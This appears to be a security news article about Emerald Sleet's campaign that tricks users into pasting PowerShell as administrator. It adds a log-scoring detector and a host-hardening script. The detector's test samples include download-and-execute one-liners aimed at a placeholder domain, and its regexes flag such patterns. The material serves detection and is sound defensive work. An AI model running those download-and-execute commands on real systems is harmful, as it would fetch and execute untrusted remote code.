Microsoft Threat Intelligence has uncovered a novel cyberattack strategy employed by the North Korean state-sponsored hacking group Emerald Sleet, also known as Kimsuky or VELVET CHOLLIMA.
The group is leveraging social engineering techniques to deceive users into executing malicious PowerShell commands with administrative privileges, enabling unauthorized access to their systems.
Emerald Sleet’s approach involves impersonating South Korean government officials to establish trust with their targets.
Once rapport is built, the attackers launch spear-phishing campaigns containing PDF attachments. These attachments direct victims to click on a URL purportedly for “device registration.”
The link provides detailed instructions, urging users to open PowerShell as administrators, paste a provided code snippet, and execute it.
The Attack Chain
When the malicious PowerShell code is executed, it downloads additional tools from a remote server.
These include a browser-based remote desktop application and a certificate file embedded with a hardcoded PIN.
The code then registers the victim’s device with the attackers’ server using the downloaded certificate and PIN.
This registration grants Emerald Sleet remote access to the compromised system, allowing them to exfiltrate sensitive data and conduct espionage activities.
This tactic marks a departure from Emerald Sleet’s traditional methods, which often relied on backdoors and malware such as PebbleDash or RDP Wrapper.
Instead of automated payload delivery mechanisms, this new approach exploits human error by manipulating victims into infecting their own systems.
By requiring user interaction, the attackers bypass conventional security measures that monitor automated processes.
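The chain above (download from a remote server, drop a remote-desktop tool and a certificate, register the device) leaves a recognisable trace in PowerShell script block logs, because the victim pastes the whole command into an elevated console. The following is an added example written for this page, not code from the Microsoft report: a small detector that scores script-block text for that paste-and-run pattern. The indicator regexes, the sample script blocks and the domain example.invalid are all constructed for illustration; in production the input is the ScriptBlockText field of Event ID 4104 from the Microsoft-Windows-PowerShell/Operational log.

```powershell
# Added example (not from the Microsoft report): score PowerShell script-block text for the
# "paste this into an elevated PowerShell" pattern described above.
# Assumed input: ScriptBlockText from Event ID 4104 (Microsoft-Windows-PowerShell/Operational).

function Test-PastedScriptBlock {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string]$ScriptBlockText
    )
    process {
        # Indicator patterns are constructed for this example, not signatures taken from the report.
        $indicators = [ordered]@{
            'remote download'       = '(?i)(Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|DownloadFile|curl\s+http)'
            'in-memory execution'   = '(?i)(Invoke-Expression|\biex\b)'
            'dropped executable'    = '(?i)Start-Process\s+.*\.(exe|msi)'
            'certificate handling'  = '(?i)(Import-PfxCertificate|Import-Certificate|certutil|\.(pfx|p12|cer)\b)'
            'scheduled persistence' = '(?i)(Register-ScheduledTask|schtasks)'
        }

        # Collect the names of every indicator family that matches this script block.
        $hits = foreach ($name in $indicators.Keys) {
            if ($ScriptBlockText -match $indicators[$name]) { $name }
        }

        # Two or more families together (e.g. download + execute) is the triage threshold used here.
        [pscustomobject]@{
            Score      = @($hits).Count
            Suspicious = (@($hits).Count -ge 2)
            Indicators = @($hits) -join ', '
            Preview    = $ScriptBlockText.Substring(0, [Math]::Min(80, $ScriptBlockText.Length))
        }
    }
}

# Constructed sample script blocks (not real attacker code). Single quotes keep $env:TEMP literal,
# exactly as it would appear in the logged script text.
$samples = @(
    'Get-ChildItem C:\Users -Recurse | Measure-Object',
    'Invoke-WebRequest -Uri "https://example.invalid/reg.zip" -OutFile "$env:TEMP\reg.zip"; Expand-Archive "$env:TEMP\reg.zip" "$env:TEMP\reg"; Start-Process "$env:TEMP\reg\agent.exe" -ArgumentList "--cert $env:TEMP\reg\device.pfx"',
    'iex (New-Object Net.WebClient).DownloadString("https://example.invalid/setup.ps1")'
)

# Expected: sample 1 scores 0, sample 2 scores 3 (download, executable, certificate), sample 3 scores 2.
$samples | Test-PastedScriptBlock | Format-Table Score, Suspicious, Indicators, Preview -AutoSize

# Production use: feed the live log instead of $samples. Properties[2] of a 4104 event is ScriptBlockText.
# Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} |
#     ForEach-Object { $_.Properties[2].Value } | Test-PastedScriptBlock | Where-Object Suspicious
```

Script block logging must be enabled for Event ID 4104 to contain the full pasted text; on a host where it is off, the function still works on any script text you hand it, but the live-log pipeline at the end returns nothing. The threshold of two indicator families is a starting point for triage, not a verdict: a legitimate deployment script can also download and run an installer, so treat a hit as a prompt to look at the process ancestry and the user's elevation, not as proof of compromise.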
Broader Context
The use of PowerShell in this attack highlights its dual nature as both a legitimate administrative tool and a vehicle for malicious activity.
PowerShell’s deep integration with Windows makes it an attractive tool for attackers seeking stealthy execution of commands directly in memory, thereby evading detection by antivirus solutions that focus on files written to disk.
Emerald Sleet’s campaign is part of a broader trend among threat actors adopting similar tactics.
For instance, other North Korean groups have used comparable methods involving macOS Terminal commands or fake CAPTCHA challenges to trick users into executing malicious scripts.
To mitigate such threats, Microsoft recommends organizations:
- Deploy advanced anti-phishing solutions to block malicious emails.
- Educate employees on identifying phishing attempts and avoiding suspicious links.
- Restrict administrative access to PowerShell and implement attack surface reduction rules to block malicious scripts.
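The second and third recommendations can be checked and partly applied on a single host from PowerShell itself. The block below is an added example, not Microsoft's own guidance or tooling: it turns on script block logging so pasted commands are recorded, enables the Microsoft Defender attack surface reduction rule that blocks potentially obfuscated scripts, and reports who on the host can open an elevated PowerShell. It assumes Microsoft Defender Antivirus is the active AV (Add-MpPreference and Get-MpPreference are Defender cmdlets) and must be run from an elevated session; the rule GUID is the one Microsoft publishes for that rule, which you should confirm against the current ASR reference before rolling out by policy.

```powershell
# Added example (not Microsoft's own guidance): apply and verify host-level controls from the
# mitigation list above. Run from an elevated PowerShell; registry writes and Add-MpPreference
# require administrator rights. Assumes Microsoft Defender Antivirus is the active AV.

#Requires -RunAsAdministrator

function Enable-ScriptBlockLogging {
    # Turns on PowerShell script block logging (Event ID 4104) so pasted commands are recorded.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord
    # Return $true only if the value reads back as enabled.
    (Get-ItemProperty -Path $key).EnableScriptBlockLogging -eq 1
}

function Enable-ObfuscatedScriptAsrRule {
    # ASR rule "Block execution of potentially obfuscated scripts". The GUID is Microsoft's
    # published rule ID; confirm it against the current ASR reference before deploying by policy.
    $ruleId = '5beb7efe-fd9a-4556-801d-275e5ffc04cc'
    Add-MpPreference -AttackSurfaceReductionRules_Ids $ruleId -AttackSurfaceReductionRules_Actions Enabled

    # Verify: Ids and Actions are parallel arrays; action value 1 means Block (0 Off, 2 Audit, 6 Warn).
    $pref = Get-MpPreference
    for ($i = 0; $i -lt @($pref.AttackSurfaceReductionRules_Ids).Count; $i++) {
        if ($pref.AttackSurfaceReductionRules_Ids[$i] -eq $ruleId) {
            return ($pref.AttackSurfaceReductionRules_Actions[$i] -eq 1)
        }
    }
    return $false
}

function Get-AdminPowerShellExposure {
    # The campaign above only works if the victim can run PowerShell as administrator, so list who
    # can, and report whether this session is already constrained (WDAC/AppLocker set
    # ConstrainedLanguage; FullLanguage means an attacker-supplied script has the full runtime).
    [pscustomobject]@{
        LocalAdmins  = (Get-LocalGroupMember -Group 'Administrators' | ForEach-Object Name) -join '; '
        LanguageMode = $ExecutionContext.SessionState.LanguageMode
    }
}

"Script block logging enabled      : $(Enable-ScriptBlockLogging)"
"ASR obfuscated-script rule blocks : $(Enable-ObfuscatedScriptAsrRule)"
Get-AdminPowerShellExposure | Format-List
```

Two design notes. The functions return booleans rather than just printing, so the same script can be dropped into a configuration-compliance check that fails the host when either control reads back as off. And the exposure report is deliberately read-only: removing users from the local Administrators group or switching the host to Constrained Language Mode through WDAC or AppLocker is a policy decision that belongs in your endpoint management tooling, not in a one-off script.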
This evolving tactic underscores the importance of vigilance against socially engineered attacks that exploit both technical vulnerabilities and human psychology.
Organizations involved in sensitive sectors such as international affairs, media, NGOs, and government agencies must prioritize robust cybersecurity measures to defend against these sophisticated campaigns.